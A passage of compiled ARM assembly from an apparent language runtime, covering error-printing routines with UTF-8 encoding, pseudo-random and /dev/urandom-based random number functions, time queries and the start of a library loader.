r3, r3, #2 ldrh r3, [r3] cmp r3, #127 bhi .L503 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-356] adc r3, r3, #0 str r3, [fp, #-352] sub r3, fp, #356 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] b .L504 .L503: sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #2048 bcs .L505 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-364] adc r3, r3, #0 str r3, [fp, #-360] sub r3, fp, #364 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-372] adc r3, r3, #0 str r3, [fp, #-368] sub r3, fp, #372 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] b .L504 .L505: sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-380] adc r3, r3, #0 str r3, [fp, #-376] sub r3, fp, #380 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-388] adc r3, r3, #0 str r3, [fp, #-384] sub r3, fp, #388 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r6, r2, #1 adc r7, r3, #0 str r6, [fp, #-308] str r7, [fp, #-304] .L504: sub r3, fp, #308 ldmia r3, {r2-r3} cmp r3, #0 cmpeq r2, #253 bls .L502 ldr r2, [fp, #-308] sub r0, fp, #288 ldr r3, [fp, #-320] mov r1, #1 bl fwrite mov r2, #0 mov r3, #0 str r2, [fp, #-308] str r3, [fp, #-304] b .L502 .L512: nop .L502: sub r3, fp, #300 ldmia r3, {r2-r3} adds r8, r2, #1 adc r9, r3, #0 str r8, [fp, #-300] str r9, [fp, #-296] .L500: sub r1, fp, #316 ldmia r1, {r0-r1} sub r3, fp, #300 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L506 ldrb r3, [fp, #-327] @ zero_extendqisi2 cmp r3, #0 beq .L507 sub r2, fp, #288 ldr r3, [fp, #-308] add r3, r2, r3 mov r2, #10 strb r2, [r3] sub r3, fp, #308 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 str r4, [fp, #-308] str r5, [fp, #-304] .L507: sub r3, fp, #308 ldmia r3, {r2-r3} orrs r3, r2, r3 beq .L508 ldr r2, [fp, #-308] sub r0, fp, #288 ldr r3, [fp, #-320] mov r1, #1 bl fwrite .L508: ldr r0, [fp, #-320] bl fflush .L511: nop nop ldr r3, .L513 ldr r2, [r3] ldr r3, [fp, #-32] eors r2, r3, r2 mov r3, #0 beq .L509 bl __stack_chk_fail .L509: sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L514: .align 2 .L513: .word .LC11 .word stderr .size shar__println__as__error, .-shar__println__as__error .section .rodata .align 2 .LC12: .ascii "Error: \000" .align 2 .LC13: .word __stack_chk_guard .text .align 2 .global shar__print__error .syntax unified .arm .fpu softvfp .type shar__print__error, %function shar__print__error: @ args = 0, pretend = 0, frame = 360 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #360 str r0, [fp, #-340] str r1, [fp, #-336] str r2, [fp, #-344] ldr r3, .L531 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 ldr r3, .L531+4 ldr r3, [r3] mov r2, #7 mov r1, #1 ldr r0, .L531+8 bl fwrite ldr r3, .L531+4 ldr r1, [r3] sub r3, fp, #340 ldmia r3, {r2-r3} str r2, [fp, #-316] str r3, [fp, #-312] ldr r3, [fp, #-344] str r3, [fp, #-324] str r1, [fp, #-320] mov r3, #1 strb r3, [fp, #-327] sub r3, fp, #316 ldmia r3, {r2-r3} orrs r3, r2, r3 bne .L516 ldrb r3, [fp, #-327] @ zero_extendqisi2 cmp r3, #0 beq .L529 .L516: mov r2, #0 mov r3, #0 str r2, [fp, #-308] str r3, [fp, #-304] mov r2, #0 mov r3, #0 str r2, [fp, #-300] str r3, [fp, #-296] b .L518 .L524: ldr r3, [fp, #-300] lsl r2, r3, #1 ldr r3, [fp, #-324] add r1, r3, r2 sub r3, fp, #28 sub r2, r3, #296 sub r2, r2, #2 ldrh r3, [r1] @ movhi strh r3, [r2] @ movhi sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #0 beq .L530 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #127 bhi .L521 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-356] adc r3, r3, #0 str r3, [fp, #-352] sub r3, fp, #356 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] b .L522 .L521: sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #2048 bcs .L523 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-364] adc r3, r3, #0 str r3, [fp, #-360] sub r3, fp, #364 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-372] adc r3, r3, #0 str r3, [fp, #-368] sub r3, fp, #372 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] b .L522 .L523: sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-380] adc r3, r3, #0 str r3, [fp, #-376] sub r3, fp, #380 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-388] adc r3, r3, #0 str r3, [fp, #-384] sub r3, fp, #388 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r6, r2, #1 adc r7, r3, #0 str r6, [fp, #-308] str r7, [fp, #-304] .L522: sub r3, fp, #308 ldmia r3, {r2-r3} cmp r3, #0 cmpeq r2, #253 bls .L520 ldr r2, [fp, #-308] sub r0, fp, #288 ldr r3, [fp, #-320] mov r1, #1 bl fwrite mov r2, #0 mov r3, #0 str r2, [fp, #-308] str r3, [fp, #-304] b .L520 .L530: nop .L520: sub r3, fp, #300 ldmia r3, {r2-r3} adds r8, r2, #1 adc r9, r3, #0 str r8, [fp, #-300] str r9, [fp, #-296] .L518: sub r1, fp, #316 ldmia r1, {r0-r1} sub r3, fp, #300 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L524 ldrb r3, [fp, #-327] @ zero_extendqisi2 cmp r3, #0 beq .L525 sub r2, fp, #288 ldr r3, [fp, #-308] add r3, r2, r3 mov r2, #10 strb r2, [r3] sub r3, fp, #308 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 str r4, [fp, #-308] str r5, [fp, #-304] .L525: sub r3, fp, #308 ldmia r3, {r2-r3} orrs r3, r2, r3 beq .L526 ldr r2, [fp, #-308] sub r0, fp, #288 ldr r3, [fp, #-320] mov r1, #1 bl fwrite .L526: ldr r0, [fp, #-320] bl fflush .L529: nop mov r0, #1 bl exit .L532: .align 2 .L531: .word .LC13 .word stderr .word .LC12 .size shar__print__error, .-shar__print__error .section .rodata .align 2 .LC14: .ascii "Error: %s\012\000" .text .align 2 .global shar__print__builtin__error .syntax unified .arm .fpu softvfp .type shar__print__builtin__error, %function shar__print__builtin__error: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r3, .L534 ldr r3, [r3] ldr r2, [fp, #-8] ldr r1, .L534+4 mov r0, r3 bl fprintf mov r0, #1 bl exit .L535: .align 2 .L534: .word stderr .word .LC14 .size shar__print__builtin__error, .-shar__print__builtin__error .local randomNumberSource .comm randomNumberSource,40,8 .data .align 3 .type currentRandomNumberIndex, %object .size currentRandomNumberIndex, 8 currentRandomNumberIndex: .word 4096 .word 0 .local randomNumbers .comm randomNumbers,32768,8 .local cryptographic__random__number__mutex .comm cryptographic__random__number__mutex,24,4 .section .rodata .align 2 .LC15: .word __stack_chk_guard .text .align 2 .global shar__get__random__number .syntax unified .arm .fpu softvfp .type shar__get__random__number, %function shar__get__random__number: @ args = 0, pretend = 0, frame = 224 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #232 ldr r3, .L539 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 mov r1, #5 ldr r0, .L539+4 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-164] str r3, [fp, #-160] sub r3, fp, #164 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #16 orr r0, r0, r3, lsl #16 lsr r1, r3, #16 ldr r2, .L539+8 mov r3, #0 and r6, r0, r2 and r7, r1, r3 mov r1, #5 ldr r0, .L539+12 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-156] str r3, [fp, #-152] sub r3, fp, #156 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #1 orr r0, r0, r3, lsl #31 lsr r1, r3, #1 ldr r2, .L539+16 mov r3, #0 and r4, r0, r2 and r5, r1, r3 orr r3, r6, r4 str r3, [fp, #-172] orr r3, r7, r5 str r3, [fp, #-168] mov r1, #5 ldr r0, .L539+20 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-148] str r3, [fp, #-144] sub r3, fp, #148 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsl r1, r3, #14 orr r1, r1, r2, lsr #18 lsl r0, r2, #14 mov r2, #-1073741824 ldr r3, .L539+24 and r8, r0, r2 and r9, r1, r3 sub r4, fp, #172 ldmia r4, {r3-r4} mov r2, r3 orr r2, r2, r8 str r2, [fp, #-180] mov r3, r4 orr r3, r3, r9 str r3, [fp, #-176] mov r1, #5 ldr r0, .L539+28 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-140] str r3, [fp, #-136] sub r3, fp, #140 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsl r1, r3, #29 orr r1, r1, r2, lsr #3 lsl r0, r2, #29 mov r2, #0 ldr r3, .L539+32 and ip, r0, r2 str ip, [fp, #-188] and r3, r1, r3 str r3, [fp, #-184] sub r2, fp, #180 ldmia r2, {r1-r2} mov r0, r1 sub r4, fp, #188 ldmia r4, {r3-r4} mov ip, r3 orr r0, r0, ip str r0, [fp, #-196] mov r3, r4 orr r3, r2, r3 str r3, [fp, #-192] mov r1, #5 ldr r0, .L539+36 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-132] str r3, [fp, #-128] sub r3, fp, #132 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsl r1, r2, #12 mov r0, #0 mov r2, #0 mov r3, #-268435456 and ip, r0, r2 str ip, [fp, #-204] and r3, r1, r3 str r3, [fp, #-200] sub r2, fp, #196 ldmia r2, {r1-r2} mov r0, r1 sub r4, fp, #204 ldmia r4, {r3-r4} mov ip, r3 orr r0, r0, ip str r0, [fp, #-252] mov r3, r4 orr r3, r2, r3 str r3, [fp, #-248] sub r4, fp, #252 ldmia r4, {r3-r4} str r3, [fp, #-44] str r4, [fp, #-40] mov r1, #5 ldr r0, .L539+4 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-124] str r3, [fp, #-120] sub r3, fp, #124 ldmia r3, {r2-r3} ldr r1, .L539+40 mul r0, r1, r3 mov r1, #0 mul r1, r2, r1 add lr, r0, r1 ldr ip, .L539+40 umull r0, r1, r2, ip add r3, lr, r1 mov r1, r3 ldr r2, .L539+44 mov r3, #0 adds ip, r0, r2 str ip, [fp, #-212] adc r3, r1, r3 str r3, [fp, #-208] sub r4, fp, #212 ldmia r4, {r3-r4} str r3, [fp, #-116] str r4, [fp, #-112] sub r3, fp, #116 ldmia r3, {r2-r3} mov r1, #5 str r1, [sp] ldr r0, .L539+4 bl __atomic_store_8 mov r1, #5 ldr r0, .L539+4 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-108] str r3, [fp, #-104] sub r1, fp, #108 ldmia r1, {r0-r1} ldr r3, .L539+40 mul r2, r3, r1 mov r3, #0 mul r3, r0, r3 add ip, r2, r3 ldr lr, .L539+40 umull r2, r3, r0, lr add r1, ip, r3 mov r3, r1 ldr r0, .L539+44 mov r1, #0 adds ip, r2, r0 str ip, [fp, #-220] adc r3, r3, r1 str r3, [fp, #-216] sub r4, fp, #220 ldmia r4, {r3-r4} str r3, [fp, #-100] str r4, [fp, #-96] sub r3, fp, #100 ldmia r3, {r2-r3} mov r1, #5 str r1, [sp] ldr r0, .L539+12 bl __atomic_store_8 mov r1, #5 ldr r0, .L539+4 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-92] str r3, [fp, #-88] sub r1, fp, #92 ldmia r1, {r0-r1} ldr r3, .L539+40 mul r2, r3, r1 mov r3, #0 mul r3, r0, r3 add ip, r2, r3 ldr lr, .L539+40 umull r2, r3, r0, lr add r1, ip, r3 mov r3, r1 ldr r0, .L539+44 mov r1, #0 adds ip, r2, r0 str ip, [fp, #-228] adc r3, r3, r1 str r3, [fp, #-224] sub r4, fp, #228 ldmia r4, {r3-r4} str r3, [fp, #-84] str r4, [fp, #-80] sub r3, fp, #84 ldmia r3, {r2-r3} mov r1, #5 str r1, [sp] ldr r0, .L539+20 bl __atomic_store_8 mov r1, #5 ldr r0, .L539+4 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-76] str r3, [fp, #-72] sub r1, fp, #76 ldmia r1, {r0-r1} ldr r3, .L539+40 mul r2, r3, r1 mov r3, #0 mul r3, r0, r3 add ip, r2, r3 ldr lr, .L539+40 umull r2, r3, r0, lr add r1, ip, r3 mov r3, r1 ldr r0, .L539+44 mov r1, #0 adds ip, r2, r0 str ip, [fp, #-236] adc r3, r3, r1 str r3, [fp, #-232] sub r4, fp, #236 ldmia r4, {r3-r4} str r3, [fp, #-68] str r4, [fp, #-64] sub r3, fp, #68 ldmia r3, {r2-r3} mov r1, #5 str r1, [sp] ldr r0, .L539+28 bl __atomic_store_8 mov r1, #5 ldr r0, .L539+4 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-60] str r3, [fp, #-56] sub r1, fp, #60 ldmia r1, {r0-r1} ldr r3, .L539+40 mul r2, r3, r1 mov r3, #0 mul r3, r0, r3 add ip, r2, r3 ldr lr, .L539+40 umull r2, r3, r0, lr add r1, ip, r3 mov r3, r1 ldr r0, .L539+44 mov r1, #0 adds ip, r2, r0 str ip, [fp, #-244] adc r3, r3, r1 str r3, [fp, #-240] sub r4, fp, #244 ldmia r4, {r3-r4} str r3, [fp, #-52] str r4, [fp, #-48] sub r3, fp, #52 ldmia r3, {r2-r3} mov r1, #5 str r1, [sp] ldr r0, .L539+36 bl __atomic_store_8 sub r3, fp, #44 ldmia r3, {r2-r3} ldr r1, .L539 ldr r0, [r1] ldr r1, [fp, #-32] eors r0, r1, r0 mov r1, #0 beq .L538 bl __stack_chk_fail .L538: mov r0, r2 mov r1, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L540: .align 2 .L539: .word .LC15 .word randomNumberSource .word 32767 .word randomNumberSource+8 .word 1073709056 .word randomNumberSource+16 .word 8191 .word randomNumberSource+24 .word 268427264 .word randomNumberSource+32 .word 1103515245 .word 12345 .size shar__get__random__number, .-shar__get__random__number .section .rodata .align 2 .LC16: .ascii "r\000" .align 2 .LC17: .ascii "/dev/urandom\000" .align 2 .LC18: .ascii "Can't read the file \"/dev/urandom\".\012\000" .align 2 .LC19: .word __stack_chk_guard .text .align 2 .global shar__get__cryptographic__random__number .syntax unified .arm .fpu softvfp .type shar__get__cryptographic__random__number, %function shar__get__cryptographic__random__number: @ args = 0, pretend = 0, frame = 56 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #64 ldr r3, .L548 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r1, #5 ldr r0, .L548+4 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-52] str r3, [fp, #-48] sub r3, fp, #52 ldmia r3, {r2-r3} cmp r3, #0 cmpeq r2, #4096 bne .L542 ldr r0, .L548+8 bl pthread_mutex_lock mov r1, #5 ldr r0, .L548+4 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-44] str r3, [fp, #-40] sub r3, fp, #44 ldmia r3, {r2-r3} cmp r3, #0 cmpeq r2, #4096 bne .L543 ldr r1, .L548+12 ldr r0, .L548+16 bl fopen str r0, [fp, #-56] ldr r3, [fp, #-56] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 bne .L544 ldr r3, [fp, #-56] mov r2, #4096 mov r1, #8 ldr r0, .L548+20 bl fread mov r3, r0 cmp r3, #4096 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L545 .L544: ldr r3, .L548+24 ldr r3, [r3] mov r2, #36 mov r1, #1 ldr r0, .L548+28 bl fwrite mov r0, #1 bl exit .L545: ldr r0, [fp, #-56] bl fclose mov r2, #0 mov r3, #0 str r2, [fp, #-36] str r3, [fp, #-32] sub r3, fp, #36 ldmia r3, {r2-r3} mov r1, #5 str r1, [sp] ldr r0, .L548+4 bl __atomic_store_8 .L543: ldr r0, .L548+8 bl pthread_mutex_unlock .L542: ldr r3, .L548+4 ldmia r3, {r2-r3} ldr r1, .L548+20 mov r3, r2 lsl r3, r3, #3 add r3, r1, r3 ldmia r3, {r2-r3} str r2, [fp, #-20] str r3, [fp, #-16] mov r3, #1 str r3, [fp, #-60] ldr r3, [fp, #-60] mov r2, r3 asr r3, r2, #31 mov r1, #5 str r1, [sp] ldr r0, .L548+4 bl __atomic_fetch_add_8 mov r2, r0 mov r3, r1 str r2, [fp, #-28] str r3, [fp, #-24] sub r3, fp, #20 ldmia r3, {r2-r3} ldr r1, .L548 ldr r0, [r1] ldr r1, [fp, #-8] eors r0, r1, r0 mov r1, #0 beq .L547 bl __stack_chk_fail .L547: mov r0, r2 mov r1, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L549: .align 2 .L548: .word .LC19 .word currentRandomNumberIndex .word cryptographic__random__number__mutex .word .LC16 .word .LC17 .word randomNumbers .word stderr .word .LC18 .size shar__get__cryptographic__random__number, .-shar__get__cryptographic__random__number .section .rodata .align 2 .LC20: .word __stack_chk_guard .text .align 2 .global shar__get__current__time .syntax unified .arm .fpu softvfp .type shar__get__current__time, %function shar__get__current__time: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #16 ldr r3, .L553 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 sub r3, fp, #40 mov r1, #0 mov r0, r3 bl gettimeofday ldr r3, [fp, #-40] mov r0, r3 asr r1, r0, #31 ldr r3, .L553+4 ldr r3, [r3] mov r2, r3 asr r3, r2, #31 subs r4, r0, r2 sbc r5, r1, r3 mov r2, r4 mov r3, r5 mov r0, #0 mov r1, #0 lsl r1, r3, #5 orr r1, r1, r2, lsr #27 lsl r0, r2, #5 mov r2, r0 mov r3, r1 subs r2, r2, r4 sbc r3, r3, r5 mov r0, #0 mov r1, #0 lsl r1, r3, #9 orr r1, r1, r2, lsr #23 lsl r0, r2, #9 mov r2, r0 mov r3, r1 adds r2, r2, r4 adc r3, r3, r5 mov r0, #0 mov r1, #0 lsl r1, r3, #6 orr r1, r1, r2, lsr #26 lsl r0, r2, #6 subs r0, r0, r2 sbc r1, r1, r3 adds r6, r0, r4 adc r7, r1, r5 ldr r3, [fp, #-36] mov r2, r3 asr r3, r2, #31 adds r8, r6, r2 adc r9, r7, r3 mov r2, r8 mov r3, r9 ldr r1, .L553 ldr r0, [r1] ldr r1, [fp, #-32] eors r0, r1, r0 mov r1, #0 beq .L552 bl __stack_chk_fail .L552: mov r0, r2 mov r1, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L554: .align 2 .L553: .word .LC20 .word timezone .size shar__get__current__time, .-shar__get__current__time .section .rodata .align 2 .LC21: .word __stack_chk_guard .text .align 2 .global shar__get__current__utc__time .syntax unified .arm .fpu softvfp .type shar__get__current__utc__time, %function shar__get__current__utc__time: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #16 ldr r3, .L558 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 sub r3, fp, #40 mov r1, #0 mov r0, r3 bl gettimeofday ldr r3, [fp, #-40] mov r4, r3 asr r5, r4, #31 mov r2, r4 mov r3, r5 mov r0, #0 mov r1, #0 lsl r1, r3, #5 orr r1, r1, r2, lsr #27 lsl r0, r2, #5 mov r2, r0 mov r3, r1 subs r2, r2, r4 sbc r3, r3, r5 mov r0, #0 mov r1, #0 lsl r1, r3, #9 orr r1, r1, r2, lsr #23 lsl r0, r2, #9 mov r2, r0 mov r3, r1 adds r2, r2, r4 adc r3, r3, r5 mov r0, #0 mov r1, #0 lsl r1, r3, #6 orr r1, r1, r2, lsr #26 lsl r0, r2, #6 subs r0, r0, r2 sbc r1, r1, r3 adds r6, r0, r4 adc r7, r1, r5 ldr r3, [fp, #-36] mov r2, r3 asr r3, r2, #31 adds r8, r6, r2 adc r9, r7, r3 mov r2, r8 mov r3, r9 ldr r1, .L558 ldr r0, [r1] ldr r1, [fp, #-32] eors r0, r1, r0 mov r1, #0 beq .L557 bl __stack_chk_fail .L557: mov r0, r2 mov r1, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L559: .align 2 .L558: .word .LC21 .size shar__get__current__utc__time, .-shar__get__current__utc__time .align 2 .global shar__load__lib .syntax unified .arm .fpu softvfp .type shar__load__lib, %function shar__load__lib: @ args = 0, pretend = 0, frame = 112 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #112 str r0, [fp, #-124] str r1, [fp, #-120] str r2, [fp, #-128] str r3, [fp, #-132] sub r3, fp, #124 ldmia r3, {r2-r3} str r2, [fp, #-76] str r3, [fp, #-72] ldr r3, [fp, #-128] str r3, [fp, #-100] mov r3, #0 str r3, [fp, #-96] mov r2, #0 mov r3, #0 str r2, [fp, #-68] str r3, [fp, #-64] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] mov r2, #0 mov r3, #0 str r2, [fp, #-52] str r3, [fp, #-48] b .L561 .L573: ldr r3, [fp, #-52] lsl r3, r3, #1 ldr r2, [fp, #-100] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-110] @ movhi mov r3, #0 strb r3, [fp, #-111] ldrh r3, [fp, #-110] cmp r3, #0 beq .L578 ldrh r3, [fp, #-110] cmp r3, #127 bhi .L564 mov r3, #1 strb r3, [fp, #-111] b .L565 .L564: ldrh r3, [fp, #-110] cmp r3, #2048 bcs .L566 mov r3, #2 strb r3, [fp, #-111] b .L565 .L566: mov r3, #3 strb r3, [fp, #-111] .L565: ldrb r2, [fp, #-111] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #60 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-60] str r7, [fp, #-56] ldr r3, [fp, #-96] str r3, [fp, #-92] sub r3, fp, #60 ldmia r3, {r2-r3} str r2, [fp, #-44] str r3, [fp, #-40] ldr r3, [fp, #-44] mov r1, r3 ldr r0, [fp, #-92] bl realloc str r0, [fp, #-88] ldr r3, [fp, #-88] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L567 ldr r3, .L579 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L579+4 bl fwrite mov r0, #1 bl exit .L567: ldr r3, [fp, #-88] str r3, [fp, #-96] ldrb r3, [fp, #-111] @ zero_extendqisi2 cmp r3, #3 beq .L569 cmp r3, #3 bgt .L570 cmp r3, #1 beq .L571 cmp r3, #2 beq .L572 b .L570 .L571: ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 ldrh r2, [fp, #-110] @ movhi and r2, r2, #255 strb r2, [r3] b .L570 .L572: ldrh r3, [fp, #-110] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 